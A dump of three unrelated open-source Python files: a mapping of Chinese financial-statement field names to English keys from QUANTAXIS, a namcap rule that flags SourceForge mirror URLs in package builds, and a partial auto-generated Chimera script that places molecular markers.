'125分配股利、利润或偿付利息支付的现金': 'cashPaymentsForDistrbutionOfDividendsOrProfits',
'126支付其他与筹资活动有关的现金': 'otherCashPaymentRelatingToFinancingActivities',
'127筹资活动现金流出小计': 'cashOutflowsFromFinancingActivities',
'128筹资活动产生的现金流量净额': 'netCashFlowsFromFinancingActivities',
# 4.4 汇率变动
'129四、汇率变动对现金的影响': 'effectOfForeignExchangRateChangesOnCash',
'130四(2)、其他原因对现金的影响': 'effectOfOtherReasonOnCash',
# 4.5 现金及现金等价物净增加
'131五、现金及现金等价物净增加额': 'netIncreaseInCashAndCashEquivalents',
'132期初现金及现金等价物余额': 'initialCashAndCashEquivalentsBalance',
# 4.6 期末现金及现金等价物余额
'133期末现金及现金等价物余额': 'theFinalCashAndCashEquivalentsBalance',
# 4.x 补充项目 Supplementary Schedule:
# 现金流量附表项目 Indirect Method
# 4.x.1 将净利润调节为经营活动现金流量 Convert net profit to cash flow from operating activities
'134净利润': 'netProfitFromOperatingActivities',
'135资产减值准备': 'provisionForAssetsLosses',
'136固定资产折旧、油气资产折耗、生产性生物资产折旧': 'depreciationForFixedAssets',
'137无形资产摊销': 'amortizationOfIntangibleAssets',
'138长期待摊费用摊销': 'amortizationOfLong-termDeferredExpenses',
'139处置固定资产、无形资产和其他长期资产的损失': 'lossOfDisposingFixedAssetsIntangibleAssetsAndOtherLong-termAssets',
'140固定资产报废损失': 'scrapLossOfFixedAssets',
'141公允价值变动损失': 'lossFromFairValueChange',
'142财务费用': 'financialExpenses',
'143投资损失': 'investmentLosses',
'144递延所得税资产减少': 'decreaseOfDeferredTaxAssets',
'145递延所得税负债增加': 'increaseOfDeferredTaxLiabilities',
'146存货的减少': 'decreaseOfInventory',
'147经营性应收项目的减少': 'decreaseOfOperationReceivables',
'148经营性应付项目的增加': 'increaseOfOperationPayables',
'149其他': 'others',
'150经营活动产生的现金流量净额2': 'netCashFromOperatingActivities2',
# 4.x.2 不涉及现金收支的投资和筹资活动 Investing and financing activities not involved in cash
'151债务转为资本': 'debtConvertedToCSapital',
'152一年内到期的可转换公司债券': 'convertibleBondMaturityWithinOneYear',
'153融资租入固定资产': 'leaseholdImprovements',
# 4.x.3 现金及现金等价物净增加情况 Net increase of cash and cash equivalents
'154现金的期末余额': 'cashEndingBal',
'155现金的期初余额': 'cashBeginingBal',
'156现金等价物的期末余额': 'cashEquivalentsEndingBal',
'157现金等价物的期初余额': 'cashEquivalentsBeginningBal',
'158现金及现金等价物净增加额': 'netIncreaseOfCashAndCashEquivalents',
# 5. 偿债能力分析
'159流动比率': 'currentRatio', # 流动资产/流动负债
'160速动比率': 'acidTestRatio', # (流动资产-存货)/流动负债
'161现金比率(%)': 'cashRatio', # (货币资金+有价证券)÷流动负债
'162利息保障倍数': 'interestCoverageRatio', # (利润总额+财务费用(仅指利息费用部份))/利息费用
'163非流动负债比率(%)': 'noncurrentLiabilitiesRatio',
'164流动负债比率(%)': 'currentLiabilitiesRatio',
'165现金到期债务比率(%)': 'cashDebtRatio', # 企业经营现金净流入/(本期到期长期负债+本期应付票据)
'166有形资产净值债务率(%)': 'debtToTangibleAssetsRatio',
'167权益乘数(%)': 'equityMultiplier', # 资产总额/股东权益总额
'168股东的权益/负债合计(%)': 'equityDebtRatio', # 权益负债率
'169有形资产/负债合计(%)': 'tangibleAssetDebtRatio ', # 有形资产负债率
'170经营活动产生的现金流量净额/负债合计(%)': 'netCashFlowsFromOperatingActivitiesDebtRatio',
'171EBITDA/负债合计(%)': 'EBITDA/Liabilities',
# 6. 经营效率分析
# 销售收入÷平均应收账款=销售收入\(0.5 x(应收账款期初+期末))
'172应收帐款周转率': 'turnoverRatioOfReceivable;',
'173存货周转率': 'turnoverRatioOfInventory',
# (存货周转天数+应收帐款周转天数-应付帐款周转天数+预付帐款周转天数-预收帐款周转天数)/365
'174运营资金周转率': 'turnoverRatioOfOperatingAssets',
'175总资产周转率': 'turnoverRatioOfTotalAssets',
'176固定资产周转率': 'turnoverRatioOfFixedAssets', # 企业销售收入与固定资产净值的比率
'177应收帐款周转天数': 'daysSalesOutstanding', # 企业从取得应收账款的权利到收回款项、转换为现金所需要的时间
'178存货周转天数': 'daysSalesOfInventory', # 企业从取得存货开始,至消耗、销售为止所经历的天数
'179流动资产周转率': 'turnoverRatioOfCurrentAssets', # 流动资产周转率(次)=主营业务收入/平均流动资产总额
'180流动资产周转天数': 'daysSalesofCurrentAssets',
'181总资产周转天数': 'daysSalesofTotalAssets',
'182股东权益周转率': 'equityTurnover', # 销售收入/平均股东权益
# 7. 发展能力分析
'183营业收入增长率(%)': 'operatingIncomeGrowth',
'184净利润增长率(%)': 'netProfitGrowthRate', # NPGR 利润总额-所得税
'185净资产增长率(%)': 'netAssetsGrowthRate',
'186固定资产增长率(%)': 'fixedAssetsGrowthRate',
'187总资产增长率(%)': 'totalAssetsGrowthRate',
'188投资收益增长率(%)': 'investmentIncomeGrowthRate',
'189营业利润增长率(%)': 'operatingProfitGrowthRate',
'190暂无': 'None1',
'191暂无': 'None2',
'192暂无': 'None3',
# 8. 获利能力分析
'193成本费用利润率(%)': 'rateOfReturnOnCost',
'194营业利润率': 'rateOfReturnOnOperatingProfit',
'195营业税金率': 'rateOfReturnOnBusinessTax',
'196营业成本率': 'rateOfReturnOnOperatingCost',
'197净资产收益率': 'rateOfReturnOnCommonStockholdersEquity',
'198投资收益率': 'rateOfReturnOnInvestmentIncome',
'199销售净利率(%)': 'rateOfReturnOnNetSalesProfit',
'200总资产报酬率': 'rateOfReturnOnTotalAssets',
'201净利润率': 'netProfitMargin',
'202销售毛利率(%)': 'rateOfReturnOnGrossProfitFromSales',
'203三费比重': 'threeFeeProportion',
'204管理费用率': 'ratioOfChargingExpense',
'205财务费用率': 'ratioOfFinancialExpense',
'206扣除非经常性损益后的净利润': 'netProfitAfterExtraordinaryGainsAndLosses',
'207息税前利润(EBIT)': 'EBIT',
'208息税折旧摊销前利润(EBITDA)': 'EBITDA',
'209EBITDA/营业总收入(%)': 'EBITDA/GrossRevenueRate',
# 9. 资本结构分析
'210资产负债率(%)': 'assetsLiabilitiesRatio',
'211流动资产比率': 'currentAssetsRatio', # 期末的流动资产除以所有者权益
'212货币资金比率': 'monetaryFundRatio',
'213存货比率': 'inventoryRatio',
'214固定资产比率': 'fixedAssetsRatio',
'215负债结构比': 'liabilitiesStructureRatio',
'216归属于母公司股东权益/全部投入资本(%)': 'shareholdersOwnershipOfAParentCompany/TotalCapital',
'217股东的权益/带息债务(%)': 'shareholdersInterest/InterestRateDebtRatio',
'218有形资产/净债务(%)': 'tangibleAssets/NetDebtRatio',
# 10. 现金流量分析
'219每股经营性现金流(元)': 'operatingCashFlowPerShare',
'220营业收入现金含量(%)': 'cashOfOperatingIncome',
'221经营活动产生的现金流量净额/经营活动净收益(%)': 'netOperatingCashFlow/netOperationProfit',
'222销售商品提供劳务收到的现金/营业收入(%)': 'cashFromGoodsSales/OperatingRevenue',
'223经营活动产生的现金流量净额/营业收入': 'netOperatingCashFlow/OperatingRevenue',
'224资本支出/折旧和摊销': 'capitalExpenditure/DepreciationAndAmortization',
'225每股现金流量净额(元)': 'netCashFlowPerShare',
'226经营净现金比率(短期债务)': 'operatingCashFlow/ShortTermDebtRatio',
'227经营净现金比率(全部债务)': 'operatingCashFlow/LongTermDebtRatio',
'228经营活动现金净流量与净利润比率': 'cashFlowRateAndNetProfitRatioOfOperatingActivities',
'229全部资产现金回收率': 'cashRecoveryForAllAssets',
# 11. 单季度财务指标
'230营业收入': 'operatingRevenueSingle',
'231营业利润': 'operatingProfitSingle',
'232归属于母公司所有者的净利润': 'netProfitBelongingToTheOwnerOfTheParentCompanySingle',
'233扣除非经常性损益后的净利润': 'netProfitAfterExtraordinaryGainsAndLossesSingle',
'234经营活动产生的现金流量净额': 'netCashFlowsFromOperatingActivitiesSingle',
'235投资活动产生的现金流量净额': 'netCashFlowsFromInvestingActivitiesSingle',
'236筹资活动产生的现金流量净额': 'netCashFlowsFromFinancingActivitiesSingle',
'237现金及现金等价物净增加额': 'netIncreaseInCashAndCashEquivalentsSingle',
# 12.股本股东
'238总股本': 'totalCapital',
'239已上市流通A股': 'listedAShares',
'240已上市流通B股': 'listedBShares',
'241已上市流通H股': 'listedHShares',
'242股东人数(户)': 'numberOfShareholders',
'243第一大股东的持股数量': 'theNumberOfFirstMajorityShareholder',
'244十大流通股东持股数量合计(股)': 'totalNumberOfTopTenCirculationShareholders',
'245十大股东持股数量合计(股)': 'totalNumberOfTopTenMajorShareholders',
# 13.机构持股
'246机构总量(家)': 'institutionNumber',
'247机构持股总量(股)': 'institutionShareholding',
'248QFII机构数': 'QFIIInstitutionNumber',
'249QFII持股量': 'QFIIShareholding',
'250券商机构数': 'brokerNumber',
'251券商持股量': 'brokerShareholding',
'252保险机构数': 'securityNumber',
'253保险持股量': 'securityShareholding',
'254基金机构数': 'fundsNumber',
'255基金持股量': 'fundsShareholding',
'256社保机构数': 'socialSecurityNumber',
'257社保持股量': 'socialSecurityShareholding',
'258私募机构数': 'privateEquityNumber',
'259私募持股量': 'privateEquityShareholding',
'260财务公司机构数': 'financialCompanyNumber',
'261财务公司持股量': 'financialCompanyShareholding',
'262年金机构数': 'pensionInsuranceAgencyNumber',
'263年金持股量': 'pensionInsuranceAgencyShareholfing',
# 14.新增指标
# [注:季度报告中,若股东同时持有非流通A股性质的股份(如同时持有流通A股和流通B股),取的是包含同时持有非流通A股性质的流通股数]
'264十大流通股东中持有A股合计(股)': 'totalNumberOfTopTenCirculationShareholders',
'265第一大流通股东持股量(股)': 'firstLargeCirculationShareholdersNumber',
# [注:1.自由流通股=已流通A股-十大流通股东5%以上的A股;2.季度报告中,若股东同时持有非流通A股性质的股份(如同时持有流通A股和流通H股),5%以上的持股取的是不包含同时持有非流通A股性质的流通股数,结果可能偏大; 3.指标按报告期展示,新股在上市日的下个报告期才有数据]
'266自由流通股(股)': 'freeCirculationStock',
'267受限流通A股(股)': 'limitedCirculationAShares',
'268一般风险准备(金融类)': 'generalRiskPreparation',
'269其他综合收益(利润表)': 'otherComprehensiveIncome',
'270综合收益总额(利润表)': 'totalComprehensiveIncome',
'271归属于母公司股东权益(资产负债表)': 'shareholdersOwnershipOfAParentCompany ',
'272银行机构数(家)(机构持股)': 'bankInstutionNumber',
'273银行持股量(股)(机构持股)': 'bankInstutionShareholding',
'274一般法人机构数(家)(机构持股)': 'corporationNumber',
'275一般法人持股量(股)(机构持股)': 'corporationShareholding',
'276近一年净利润(元)': 'netProfitLastYear',
'277信托机构数(家)(机构持股)': 'trustInstitutionNumber',
'278信托持股量(股)(机构持股)': 'trustInstitutionShareholding',
'279特殊法人机构数(家)(机构持股)': 'specialCorporationNumber',
'280特殊法人持股量(股)(机构持股)': 'specialCorporationShareholding',
'281加权净资产收益率(每股指标)': 'weightedROE',
'282扣非每股收益(单季度财务指标)': 'nonEPSSingle',
'283最近一年营业收入()': 'lastYearOperatingIncome',
'284国家队持股数量(万股)': 'nationalTeamShareholding',
# [注:本指标统计包含汇金公司、证金公司、外汇管理局旗下投资平台、国家队基金、国开、养老金以及中科汇通等国家队机构持股数量]
'285业绩预告-本期净利润同比增幅下限%': 'PF_theLowerLimitoftheYearonyearGrowthofNetProfitForThePeriod',
# [注:指标285至294展示未来一个报告期的数据。例,3月31日至6月29日这段时间内展示的是中报的数据;如果最新的财务报告后面有多个报告期的业绩预告/快报,只能展示最新的财务报告后面的一个报告期的业绩预告/快报]
'286业绩预告-本期净利润同比增幅上限%': 'PF_theHigherLimitoftheYearonyearGrowthofNetProfitForThePeriod',
'287业绩快报-归母净利润': 'PE_returningtotheMothersNetProfit',
'288业绩快报-扣非净利润': 'PE_Non-netProfit',
'289业绩快报-总资产': 'PE_TotalAssets',
'290业绩快报-净资产': 'PE_NetAssets',
'291业绩快报-每股收益': 'PE_EPS',
'292业绩快报-摊薄净资产收益率': 'PE_DilutedROA',
'293业绩快报-加权净资产收益率': 'PE_WeightedROE',
'294业绩快报-每股净资产': 'PE_NetAssetsperShare',
'295应付票据及应付账款(资产负债表)': 'BS_NotesPayableandAccountsPayable',
'296应收票据及应收账款(资产负债表)': 'BS_NotesReceivableandAccountsReceivable',
'297递延收益(资产负债表)': 'BS_DeferredIncome',
'298其他综合收益(资产负债表)': 'BS_OtherComprehensiveIncome',
'299其他权益工具(资产负债表)': 'BS_OtherEquityInstruments',
'300其他收益(利润表)': 'IS_OtherIncome',
'301资产处置收益(利润表)': 'IS_AssetDisposalIncome',
'302持续经营净利润(利润表)': 'IS_NetProfitforContinuingOperations',
'303终止经营净利润(利润表)': 'IS_NetProfitforTerminationOperations',
'304研发费用(利润表)': 'IS_R&DExpense',
'305其中:利息费用(利润表-财务费用)': 'IS_InterestExpense',
'306其中:利息收入(利润表-财务费用)': 'IS_InterestIncome',
'307近一年经营活动现金流净额': 'netCashFlowfromOperatingActivitiesinthepastyear',
'308近一年归母净利润': 'Net_profit_attributable to the mother in the recent year',
'309近一年扣非净利润': 'Nearly_one_year_net profit after deduction',
'310近一年现金净流量': 'Net cash flow in the past year',
'311基本每股收益(单季度)': 'Basic earnings per share (single quarter)',
'312营业总收入(单季度)': 'Total operating income (single quarter) ',
'313业绩预告公告日期': 'Announcement date of earnings forecast',
'314财报公告日期': 'earnings announcement date',
'315业绩快报公告日期': 'Earnings Update Announcement Date',
'316近一年投资活动现金流净额': 'Net cash flow from investing activities in the past year ',
'317业绩预告-本期净利润下限': 'Forecast of performance',
'318业绩预告-本期净利润上限': 'Forecast of Results - Current Period Net Income Cap',
'319营业总收入TTM': 'Total Operating Income TTM',
'320员工总数(人)': 'Total number of employees (people)',
'321每股企业自由现金流': 'Corporate Free Cash Flow per Share',
'322每股股东自由现金流': 'Free cash flow per share for shareholders',
'323备用323': 'unknown323',
'324备用324': 'unknown324',
'325备用325': 'unknown325',
'326备用326': 'unknown326',
'327备用327': 'unknown327',
'328备用328': 'unknown328',
'329备用329': 'unknown329',
'330备用330': 'unknown330',
'331备用331': 'unknown331',
'332备用332': 'unknown332',
'333备用333': 'unknown333',
'334备用334': 'unknown334',
'335备用335': 'unknown335',
'336备用336': 'unknown336',
'337备用337': 'unknown337',
'338备用338': 'unknown338',
'339备用339': 'unknown339',
'340备用340': 'unknown340',
'341备用341': 'unknown341',
'342备用342': 'unknown342',
'343备用343': 'unknown343',
'344备用344': 'unknown344',
'345备用345': 'unknown345',
'346备用346': 'unknown346',
'347备用347': 'unknown347',
'348备用348': 'unknown348',
'349备用349': 'unknown349',
'350备用350': 'unknown350',
'351备用351': 'unknown351',
'352备用352': 'unknown352',
'353备用353': 'unknown353',
'354备用354': 'unknown354',
'355备用355': 'unknown355',
'356备用356': 'unknown356',
'357备用357': 'unknown357',
'358备用358': 'unknown358',
'359备用359': 'unknown359',
'360备用360': 'unknown360',
'361备用361': 'unknown361',
'362备用362': 'unknown362',
'363备用363': 'unknown363',
'364备用364': 'unknown364',
'365备用365': 'unknown365',
'366备用366': 'unknown366',
'367备用367': 'unknown367',
'368备用368': 'unknown368',
'369备用369': 'unknown369',
'370备用370': 'unknown370',
'371备用371': 'unknown371',
'372备用372': 'unknown372',
'373备用373': 'unknown373',
'374备用374': 'unknown374',
'375备用375': 'unknown375',
'376备用376': 'unknown376',
'377备用377': 'unknown377',
'378备用378': 'unknown378',
'379备用379': 'unknown379',
'380备用380': 'unknown380',
'381备用381': 'unknown381',
'382备用382': 'unknown382',
'383备用383': 'unknown383',
'384备用384': 'unknown384',
'385备用385': 'unknown385',
'386备用386': 'unknown386',
'387备用387': 'unknown387',
'388备用388': 'unknown388',
'389备用389': 'unknown389',
'390备用390': 'unknown390',
'391备用391': 'unknown391',
'392备用392': 'unknown392',
'393备用393': 'unknown393',
'394备用394': 'unknown394',
'395备用395': 'unknown395',
'396备用396': 'unknown396',
'397备用397': 'unknown397',
'398备用398': 'unknown398',
'399备用399': 'unknown399',
'400备用400': 'unknown400',
# 资产负债表新增指标---
'401专项储备': 'Special reserve',
'402结算备付金': 'Settlement provision',
'403拆出资金': 'Funds removed',
'404发放贷款及垫款': 'Loans and advances granted',
'405衍生金融资产': 'Derivative financial assets',
'406应收保费': 'Premium receivable',
'407应收分保账款': 'Sub-insurance receivables',
'408应收分保合同准备金': 'Provision for sub-insurance contracts receivable',
'409买入返售金融资产': 'Buy-back financial assets',
'410划分为持有待售的资产': 'Assets classified as held for sale',
'411发放贷款及垫款': 'Loans and advances granted',
'412向中央银行借款': 'Borrowings from central banks',
'413吸收存款及同业存放': 'Absorption of deposits and interbank deposits',
'414拆入资金': 'Funds borrowed',
'415衍生金融负债': 'Derivative financial liabilities',
'416卖出回购金融资产款': 'Sale of repurchase financial assets',
'417应付手续费及佣金': 'Fees and commissions payable',
'418应付分保账款': 'Payables to sub-insurance accounts',
'419保险合同准备金': 'Provision for insurance contracts',
'420代理买卖证券款': 'Agency securities trading',
'421代理承销证券款': 'Agency underwriting of securities',
'422划分为持有待售的负债': 'Liabilities classified as held for sale',
'423预计负债': 'Projected liabilities',
'424递延收益': 'Deferred income',
'425其中:优先股': 'Deferred incomeOf which:Preferred stock',
'426永续债非流动负债科目': 'Perpetual bonds',
'427长期应付职工薪酬': 'Long-term employee compensation payable',
'428其中:优先股': 'Long-term employee compensation payable Of which:Preferred shares',
'429永续债所有者权益科目': 'Perpetual debentures Owners equity account',
'430债权投资': 'Debt investments',
'431其他债权投资': 'Other debt investments',
'432其他权益工具投资': 'Investment in other equity instruments',
'433其他非流动金融资产': 'Other non-current financial assets',
'434合同负债': 'Contract liabilities',
'435合同资产': 'Contract assets',
'436其他资产': 'Other assets',
'437应收款项融资': 'Financing of receivables',
'438使用权资产': 'Right-of-use assets',
'439租赁负债': 'Lease liabilities',
'440备用440': 'unknown440',
'441备用441': 'unknown441',
'442备用442': 'unknown442',
'443备用443': 'unknown443',
'444备用444': 'unknown444',
'445备用445': 'unknown445',
'446备用446': 'unknown446',
'447备用447': 'unknown447',
'448备用448': 'unknown448',
'449备用449': 'unknown449',
'450备用450': 'unknown450',
'451备用451': 'unknown451',
'452备用452': 'unknown452',
'453备用453': 'unknown453',
'454备用454': 'unknown454',
'455备用455': 'unknown455',
'456备用456': 'unknown456',
'457备用457': 'unknown457',
'458备用458': 'unknown458',
'459备用459': 'unknown459',
'460备用460': 'unknown460',
'461备用461': 'unknown461',
'462备用462': 'unknown462',
'463备用463': 'unknown463',
'464备用464': 'unknown464',
'465备用465': 'unknown465',
'466备用466': 'unknown466',
'467备用467': 'unknown467',
'468备用468': 'unknown468',
'469备用469': 'unknown469',
'470备用470': 'unknown470',
'471备用471': 'unknown471',
'472备用472': 'unknown472',
'473备用473': 'unknown473',
'474备用474': 'unknown474',
'475备用475': 'unknown475',
'476备用476': 'unknown476',
'477备用477': 'unknown477',
'478备用478': 'unknown478',
'479备用479': 'unknown479',
'480备用480': 'unknown480',
'481备用481': 'unknown481',
'482备用482': 'unknown482',
'483备用483': 'unknown483',
'484备用484': 'unknown484',
'485备用485': 'unknown485',
'486备用486': 'unknown486',
'487备用487': 'unknown487',
'488备用488': 'unknown488',
'489备用489': 'unknown489',
'490备用490': 'unknown490',
'491备用491': 'unknown491',
'492备用492': 'unknown492',
'493备用493': 'unknown493',
'494备用494': 'unknown494',
'495备用495': 'unknown495',
'496备用496': 'unknown496',
'497备用497': 'unknown497',
'498备用498': 'unknown498',
'499备用499': 'unknown499',
'500备用500': 'unknown500',
'501稀释每股收益': 'Diluted earnings per share',
'502营业总收入': "Total operating income",
'503汇兑收益': 'Foreign exchange gain',
'504其中:归属于母公司综合收益': 'Comprehensive income attributable to parent company',
'505其中:归属于少数股东综合收益': 'Comprehensive income attributable to minority shareholders',
'506利息收入': 'Interest income',
'507已赚保费': 'Premiums earned',
'508手续费及佣金收入': 'Fee and commission income',
'509利息支出': 'Interest expense',
'510手续费及佣金支出': 'Handling and commission expenses',
'511退保金': 'Surrender premiums',
'512赔付支出净额': 'Net payout expenses',
'513提取保险合同准备金净额': 'Net withdrawal of insurance contract reserve',
'514保单红利支出': 'Policy dividend expense',
'515分保费用': 'Ceding expenses',
'516其中:非流动资产处置利得': 'Gain on disposal of non-current assets',
'517信用减值损失': 'Credit impairment loss',
'518净敞口套期收益': 'Net exposure hedging gain',
'519营业总成本': 'Total operating costs',
'520信用减值损失': 'Credit impairment loss',
'521资产减值损失': 'Impairment loss on assets',
'522备用522': 'unknown522',
'523备用523': 'unknown523',
'524备用524': 'unknown524',
'525备用525': 'unknown525',
'526备用526': 'unknown526',
'527备用527': 'unknown527',
'528备用528': 'unknown528',
'529备用529': 'unknown529',
'530备用530': 'unknown530',
'531备用531': 'unknown531',
'532备用532': 'unknown532',
'533备用533': 'unknown533',
'534备用534': 'unknown534',
'535备用535': 'unknown535',
'536备用536': 'unknown536',
'537备用537': 'unknown537',
'538备用538': 'unknown538',
'539备用539': 'unknown539',
'540备用540': 'unknown540',
'541备用541': 'unknown541',
'542备用542': 'unknown542',
'543备用543': 'unknown543',
'544备用544': 'unknown544',
'545备用545': 'unknown545',
'546备用546': 'unknown546',
'547备用547': 'unknown547',
'548备用548': 'unknown548',
'549备用549': 'unknown549',
'550备用550': 'unknown550',
'551备用551': 'unknown551',
'552备用552': 'unknown552',
'553备用553': 'unknown553',
'554备用554': 'unknown554',
'555备用555': 'unknown555',
'556备用556': 'unknown556',
'557备用557': 'unknown557',
'558备用558': 'unknown558',
'559备用559': 'unknown559',
'560备用560': 'unknown560',
'561:其他原因对现金的影响2': 'Add:Effect of other causes on cash2',
'562客户存款和同业存放款项净增加额': 'Net increase in customer deposits and interbank deposits',
'563向中央银行借款净增加额': 'Net increase in borrowings from central banks',
'564向其他金融机构拆入资金净增加额': 'Net increase in funds borrowed from other financial institutions',
'565收到原保险合同保费取得的现金': 'Cash received from premiums on original insurance contracts',
'566收到再保险业务现金净额': 'Net cash received from reinsurance business',
'567保户储金及投资款净增加额': 'Net increase in policyholders deposits and investment funds',
'568处置以公允价值计量且其变动计入当期损益的金融资产净增加额': 'Net increase in disposal of financial assets at fair value through profit or loss',
'569收取利息、手续费及佣金的现金': 'Cash received from interest, fees and commissions',
'570拆入资金净增加额': 'Net increase in funds transferred in ',
'571回购业务资金净增加额': 'Net increase in funds from repo business',
'572客户贷款及垫款净增加额': 'Net increase in loans and advances to customers',
'573存放中央银行和同业款项净增加额': 'Net increase in deposits with central banks and interbank',
'574支付原保险合同赔付款项的现金': 'Cash paid for claims on original insurance contracts',
'575支付利息、手续费及佣金的现金': 'Cash paid for interest, fees and commissions',
'576支付保单红利的现金': 'Cash paid for policy dividends',
'577其中:子公司吸收少数股东投资收到的现金': 'cash received from minority shareholders investment in subsidiaries',
'578其中:子公司支付给少数股东的股利利润': 'Dividends and profits paid by subsidiaries to minority shareholders',
'579投资性房地产的折旧及摊销': 'Depreciation and amortization of investment properties',
'580信用减值损失': 'Credit impairment loss'
}
| yutiansut/QUANTAXIS | QUANTAXIS/QAData/financial_mean.py | Python | mit | 36,309 |
#
# namcap rules - sfurl
# Copyright (C) 2004-2009 Ben Mazer <ben@benmazer.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import re
from Namcap.ruleclass import *
class package(PkgbuildRule):
name = "sfurl"
description = "Checks for proper sourceforge URLs"
def analyze(self, pkginfo, tar):
if 'source' in pkginfo:
for source in pkginfo["source"]:
if re.match('(http://|ftp://)\w+.dl.(sourceforge|sf).net', source) != None:
self.warnings.append(("specific-sourceforge-mirror", ()))
if re.match('(http://|ftp://)dl.(sourceforge|sf).net', source) != None:
self.warnings.append(("using-dl-sourceforge", ()))
# vim: set ts=4 sw=4 noet:
| anatol/namcap | Namcap/rules/sfurl.py | Python | gpl-2.0 | 1,348 |
import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "particle_0 geometry" not in marker_sets:
s=new_marker_set('particle_0 geometry')
marker_sets["particle_0 geometry"]=s
s= marker_sets["particle_0 geometry"]
mark=s.place_marker((9661.74, 6510.06, 8334.98), (0.7, 0.7, 0.7), 890.203)
if "particle_1 geometry" not in marker_sets:
s=new_marker_set('particle_1 geometry')
marker_sets["particle_1 geometry"]=s
s= marker_sets["particle_1 geometry"]
mark=s.place_marker((8172.17, 6939.27, 7094.67), (0.7, 0.7, 0.7), 792.956)
if "particle_2 geometry" not in marker_sets:
s=new_marker_set('particle_2 geometry')
marker_sets["particle_2 geometry"]=s
s= marker_sets["particle_2 geometry"]
mark=s.place_marker((7514.32, 6168.44, 5626.51), (0.7, 0.7, 0.7), 856.786)
if "particle_3 geometry" not in marker_sets:
s=new_marker_set('particle_3 geometry')
marker_sets["particle_3 geometry"]=s
s= marker_sets["particle_3 geometry"]
mark=s.place_marker((9092.57, 5230.04, 4177.09), (0.7, 0.7, 0.7), 963.679)
if "particle_4 geometry" not in marker_sets:
s=new_marker_set('particle_4 geometry')
marker_sets["particle_4 geometry"]=s
s= marker_sets["particle_4 geometry"]
mark=s.place_marker((8745.86, 6074.21, 3523.05), (0.7, 0.7, 0.7), 761.442)
if "particle_5 geometry" not in marker_sets:
s=new_marker_set('particle_5 geometry')
marker_sets["particle_5 geometry"]=s
s= marker_sets["particle_5 geometry"]
mark=s.place_marker((7165.18, 7724.48, 4084.38), (0.7, 0.7, 0.7), 961.183)
if "particle_6 geometry" not in marker_sets:
s=new_marker_set('particle_6 geometry')
marker_sets["particle_6 geometry"]=s
s= marker_sets["particle_6 geometry"]
mark=s.place_marker((8246.24, 10417.5, 3680.61), (0.7, 0.7, 0.7), 753.151)
if "particle_7 geometry" not in marker_sets:
s=new_marker_set('particle_7 geometry')
marker_sets["particle_7 geometry"]=s
s= marker_sets["particle_7 geometry"]
mark=s.place_marker((9136.84, 11096.5, 2886.49), (1, 0.7, 0), 1098.07)
if "particle_8 geometry" not in marker_sets:
s=new_marker_set('particle_8 geometry')
marker_sets["particle_8 geometry"]=s
s= marker_sets["particle_8 geometry"]
mark=s.place_marker((5652.63, 9793.87, 5469.56), (0.7, 0.7, 0.7), 1010.42)
if "particle_9 geometry" not in marker_sets:
s=new_marker_set('particle_9 geometry')
marker_sets["particle_9 geometry"]=s
s= marker_sets["particle_9 geometry"]
mark=s.place_marker((5673.29, 10038.9, 6543.67), (1, 0.7, 0), 821.043)
if "particle_10 geometry" not in marker_sets:
s=new_marker_set('particle_10 geometry')
marker_sets["particle_10 geometry"]=s
s= marker_sets["particle_10 geometry"]
mark=s.place_marker((5871.74, 8467.28, 7421.64), (0.7, 0.7, 0.7), 873.876)
if "particle_11 geometry" not in marker_sets:
s=new_marker_set('particle_11 geometry')
marker_sets["particle_11 geometry"]=s
s= marker_sets["particle_11 geometry"]
mark=s.place_marker((6217.57, 7158.24, 8911.98), (0.7, 0.7, 0.7), 625.532)
if "particle_12 geometry" not in marker_sets:
s=new_marker_set('particle_12 geometry')
marker_sets["particle_12 geometry"]=s
s= marker_sets["particle_12 geometry"]
mark=s.place_marker((4692.41, 6812.6, 8240.75), (0.7, 0.7, 0.7), 880.474)
if "particle_13 geometry" not in marker_sets:
s=new_marker_set('particle_13 geometry')
marker_sets["particle_13 geometry"]=s
s= marker_sets["particle_13 geometry"]
mark=s.place_marker((4025.88, 5645.2, 6934.89), (0.7, 0.7, 0.7), 659.161)
if "particle_14 geometry" not in marker_sets:
s=new_marker_set('particle_14 geometry')
marker_sets["particle_14 geometry"]=s
s= marker_sets["particle_14 geometry"]
mark=s.place_marker((4621.92, 4570.73, 7922.58), (0.7, 0.7, 0.7), 831.745)
if "particle_15 geometry" not in marker_sets:
s=new_marker_set('particle_15 geometry')
marker_sets["particle_15 geometry"]=s
s= marker_sets["particle_15 geometry"]
mark=s.place_marker((4507.82, 2923.97, 9830.72), (0.7, 0.7, 0.7), 803.065)
if "particle_16 geometry" not in marker_sets:
s=new_marker_set('particle_16 geometry')
marker_sets["particle_16 geometry"]=s
s= marker_sets["particle_16 geometry"]
mark=s.place_marker((5097.04, 4550.86, 9359.33), (0.7, 0.7, 0.7), 610.262)
if "particle_17 geometry" not in marker_sets:
s=new_marker_set('particle_17 geometry')
marker_sets["particle_17 geometry"]=s
s= marker_sets["particle_17 geometry"]
mark=s.place_marker((6024.53, 5806.87, 9296.76), (0.7, 0.7, 0.7), 741.265)
if "particle_18 geometry" not in marker_sets:
s=new_marker_set('particle_18 geometry')
marker_sets["particle_18 geometry"]=s
s= marker_sets["particle_18 geometry"]
mark=s.place_marker((6995.84, 4767.27, 8752.82), (0.7, 0.7, 0.7), 748.625)
if "particle_19 geometry" not in marker_sets:
s=new_marker_set('particle_19 geometry')
marker_sets["particle_19 geometry"]=s
s= marker_sets["particle_19 geometry"]
mark=s.place_marker((5510.04, 4428.3, 8876.8), (0.7, 0.7, 0.7), 677.181)
if "particle_20 geometry" not in marker_sets:
s=new_marker_set('particle_20 geometry')
marker_sets["particle_20 geometry"]=s
s= marker_sets["particle_20 geometry"]
mark=s.place_marker((4694.84, 5514.64, 7708.26), (0.7, 0.7, 0.7), 616.015)
if "particle_21 geometry" not in marker_sets:
s=new_marker_set('particle_21 geometry')
